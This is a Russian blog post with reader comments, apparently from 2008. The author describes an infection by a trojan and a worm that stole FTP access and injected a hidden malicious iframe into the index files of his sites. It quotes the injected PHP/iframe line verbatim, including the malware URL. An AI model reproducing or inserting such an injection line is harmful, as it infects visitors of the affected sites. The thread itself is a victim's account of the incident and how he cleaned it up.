Подцепил заразу (трояна win32/Kryptik. CH и червя Win32/Pinit)
Проснулся пару часов назад, смотрю почти все сайты выдают ошибку.
Думаю, что за чёрт?
Лезу в код сайтов и вижу что приписана строчка для вставки скрытого слоя:
<?php echo '<div style="visibility:hiddеn"><ifrаmе src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></ifrаmе></div>’; ?>
Это всё вижу под маком, загружаю ноут с виндой в безопасном режиме и сразу за чистку.
Подцепил трояна win32/Kryptik. CH и червя Win32/Pinit. D оба свеженькие, по датам видно что как сутки — двое появились в базах антивирусных.
Самое интересное, что похоже подцепил через заражённый GIF, зайдя на вредоносный сайт IE7.
Принцип действия заразы
Анализируя то что успел натворить троян/вирь, можно сказать что он искал фтп соединения, сканировал все папки на фтп и в найденные index.* вставлял ифрейм с вредоносным кодом.
Радует: Вебмани на отдельной виртуальной машине — там почти исключена вирусная активность. ЯД тоже на месте. Троян пароли нигде не поменял, теперь это мой долг.
Вспомнил SEObot’а и ещё знакомого, у которого увели 2000 вмз на днях.
Из непонятного: код появился даже на тех сайтах, пароль от которых не был сохранён в тоталкомандере (сохраняю только от аккаунтов с сателлитами). А на части сохранённых — кода нет.
Порадовал Друпал — вставка кода вызывала ошибку, так что большинство пользователей просто видели в течении 4 часов ошибку. Для тех, кто всё же пострадал — приношу извинения и рекомендую обновить антивирусные базы и проверить компьютер.
зы. Как назло, вчера вечером проверял на вирусы в 20-21 час, не помогло, уже сидели в памяти враги.
Убираем последствия
Написал нехитрый скрипт, который позволяет вычищать вставки вируса из файлов.
Подписывайтесь на rss (Что такое RSS?) чтобы оперативно получать информацию о новых записях:
Как оттестирую скрипт - выложу на блоге.
Будьте осторожны!
зы. Антивирус Nod32.
Постовые
Любишь ночную клубную жизнь? Все клубы Москвы и области. Будь в курсе вечеринок и новостей из клубной жизни.
Сайт для ценителей кофе: статьи о кофе, кофеварках, кофемашинах.
Да, с вирусами надо быть осторожнее. Как кошмарный сон представляю себе прошлые события своей чистки сайтов(((
- ответить
Отправил Автоинструктор (не зарегистрирован) (пт., 12/05/2008 - 18:57)Тот же самый вирус сегодня обнаружил...
- ответить
Отправил Гость (не зарегистрирован) (сб., 12/06/2008 - 18:33)Мне больше по душе - почему-то касперкий
Его главное хорошо настроить:)
- ответить
Отправил dert88 (не зарегистрирован) (вс., 12/07/2008 - 12:27)епать Гога, опять по порнухе лазал ?
шутка. =) хотя в каждой шутке есть доля шутки
- ответить
Отправил Сыктывкарский бомж (не зарегистрирован) (вс., 12/07/2008 - 20:11)Ослом не пользуюсь, да и какая порнуха?
Наверное вёрстку тестил в этом убогом браузере и случайно в соседней вкладке что-то открыл ((
Хотя это может быть и не причина, но заражённый гиф Нод нашёл во временных файлах именно осла.
Ну ничего, это урок будет.
Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.
- ответить
Отправил GogA (пн., 12/08/2008 - 02:25)Такую же дрянь подцепили
- ответить
Отправил Гость (не зарегистрирован) (пн., 12/08/2008 - 13:54)у меня не только в файле index была добавлена эта строчка, но и в файле /includes/home.php.
- ответить
Отправил EASIER (не зарегистрирован) (пн., 12/08/2008 - 14:42)Ближе к ночи выложу скрипт, как бороться с последствиями шуршания по фтп от этого червя.
- ответить
Отправил GogA (пн., 12/08/2008 - 17:10)жду скрипта!!! Pinit на 4-х машинах, даже негде взять чистый user32.dll!
- ответить
Отправил welder (не зарегистрирован) (пт., 12/12/2008 - 11:05)Скрипт для чистки фтп, пока только через почту - нужно, пишите.
- ответить
Отправил GogA (ср., 12/17/2008 - 01:38)GogA, оправь, пж, на gazonos@gmail.com, а то нод эти вирусы определяет в мр3 и удаляет. а хочется почистить файлы и послушать.
- ответить
Отправил Гость (не зарегистрирован) (вт., 02/23/2010 - 10:21)http://gogolev.net/node/94
Опубликована уже запись, с инструкцией как чистить пострадавшие файлы.
- ответить
Отправил GogA (ср., 02/24/2010 - 09:36)Фигня, а не троян...
Помница смотрел исходники полиморфного вируса на php - вот это реальное веселье :) А если хреново права настроены на серваке, то и веселье хостеру и всем пользователям хостинга.
- ответить
Отправил KCEOH (не зарегистрирован) (пн., 12/08/2008 - 22:12)Писец, скоро в туалетную бумагу и в зубочистки вирусы встраивать начнут. Как жить? =)
- ответить
Отправил Роман (не зарегистрирован) (вт., 12/09/2008 - 22:56)Win32/Pinit - эта гадость не удаляется.... я уже отчаялась.... после нее перестали принтеры работать!!
- ответить
Отправил Александра (не зарегистрирован) (чт., 12/11/2008 - 00:19)Страшная гатость энти вирусы... На локальной машине каспер и нод сравнивали... после каспера нод не нашел ничего, а вот после нода каспер одну заразу откапал. вот так вот.
ЗЫ. Без разницы какой антивирь, базы свежие всегда должны быть.
- ответить
Отправил Самарский бомж (не зарегистрирован) (пн., 12/15/2008 - 08:04)Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.
По хорешему не надо ждать этиъ еще чуть чуть. Просто может так чтать, что после чуть чуть денег на отдельный ноутбук уже н ебудет. :) Просто так, заметка... :)
- ответить
Отправил Vetroff (не зарегистрирован) (пн., 12/15/2008 - 23:47)Ну давно уже народ так поступает, кто-то кпк покупает для фин операций, кто-то сейчас берёт Asus eeePC.
Я в сторону последнего смотрю, может на НГ дед мороз подарит :)
- ответить
Отправил GogA (ср., 12/17/2008 - 01:43)Использую лицензионный KIS (Kaspersky Internet Security), отличная защита, один раз мне на сайт подцепили троя, так при заходе KIS заблочил его вызов :)
- ответить
Отправил Мостовой Ю. Р. (не зарегистрирован) (вт., 12/16/2008 - 02:02)А как вылечить собственно машину, помимо ликвидации последствий?
- ответить
Отправил CLS (не зарегистрирован) (вт., 12/16/2008 - 08:42)Свой ноут (не рабочий), отключил от инета. Инфы там нужной почти не осталось, так что скоро формат с: ентер.
- ответить
Отправил GogA (ср., 12/17/2008 - 01:41)Напишите,как виртаульной машиной пользоваться..
Статью по безопасности, так сказать.Темку подкинул :)
- ответить
Отправил Волжский (не зарегистрирован) (вт., 12/16/2008 - 23:31)В Америке вот недавно вирус-спамера посадили на 7 лет. Конечно, он просто козел отпущения, но нам бы такой не помешал, как думаете?
- ответить
Отправил Милан (не зарегистрирован) (пн., 01/12/2009 - 01:16)Перед новым годом на такой влетел, точнее на 5 сразу разных.
По модерским делам форума проверял ссылки в постах - ну и.
С зачисткой вроде справился.
Но, возникло тут одно но недавно
С моей аськи прет спам, в логах ничего нет. Не могу понять как такое может быть и что главное делать то.
- ответить
Отправил oldvovk (не зарегистрирован) (вс., 01/18/2009 - 03:45)А что за эксплойт такой с заражённым gif?
- ответить
Отправил Скачать бесплатно (не зарегистрирован) (вс., 02/01/2009 - 21:48)Мои сайтикы частенько так вирусовали. Но виноват был не я, тогда моего хостера взламывали и все аккаунты заражали. Но у вас наверное свой сервак.
- ответить
Отправил NOMAD86 (не зарегистрирован) (сб., 02/07/2009 - 09:23)Искоренить причину это одно, предполагается что это уже сделано. Тут может быть как троян так и взлом хостера.
Пост нацелен на искоренение результатов работы трояна (вставки в код страниц вредоносного кода).
- ответить
Отправил GogA (пн., 03/23/2009 - 16:45)Точно..Win32/Pinit вот эту падлу убивал
Причем на друпале сайты просто вылетели. А вот на вордпрессе на всех сайтах слетела кодировка ( судя по всему с UTF этот троян не очень дружит) на на некторых кроме ифрейма он впихнул загрузчик другого трояна - AVG так парой и ловил
- ответить
Отправил Бомж беглый (не зарегистрирован) (вс., 04/19/2009 - 23:32)У меня тоже что то подобное, но злобного вроде ничего не сделал просто блокировал загрузку сайта пока не удалила вирус
- ответить
Отправил Милая Женщина (не зарегистрирован) (пт., 05/01/2009 - 14:03)С такой же фигней неделю мучался. Решил запустить полную проверку компа. Касперский нашел около 30 троянов и один вирус, несмотря на то что я ежедневно его обновляю и настройки защиты выставил максимальные.
Потом форматнул все что только можно, перезалил вордпресс, поменял все пароли, написал хостеру, чтобы он тоже там почистил.
Второй день - вроде тихо.
Вирусоделов надо в тире выставлять и лупить по ним из боевого оружия...
- ответить
Отправил dakozz (не зарегистрирован) (вт., 05/12/2009 - 13:18)столкнулся с такои проблемои,этот вирус заблокировал комп и мне пришлось отправлять смс,которое стоит 150 рублеи,кому интересен код разблокировки пишите сюда
- ответить
Отправил Руслан (не зарегистрирован) (пт., 11/27/2009 - 23:10)Извините, но очень глупо потакать шантажистам, только способствуете их развитию.
Полезный сайт для определения стоимости sms — http://smscost.ru/
- ответить
Отправил GogA (сб., 11/28/2009 - 12:12)Руслан, подскажите на счёт кода, плийз, чтобы смс не отправлять, то же и у меня было((
- ответить
Отправил Гость (не зарегистрирован) (ср., 08/25/2010 - 21:37)Во все индексы вставляла вредоносный код в конце. А потом прописала в .htaccess, что все переходы на мой сайт с поисковиков уходили на левые сайты. В день удалял по два раза. Потом понял, что вирус не на сайте а в компе. Вроде каспер стоял, ОБНОВЛЯЛСЯ падла. Доктор веб помог (curseit) - всю заразу схавал - оказывается была она в гифах (иконки скачал на свою голову)! Так что всем советую - если такая зараза, то качай curseit и используй не тотал-командер и файл-зилу - лучше сразу править в браузере (для этого я теперь использую мазилу.
Крутая капча стоит - скажи где вазял?
- ответить
Отправил wertyuiop (не зарегистрирован) (пт., 04/09/2010 - 20:52)Отправить комментарий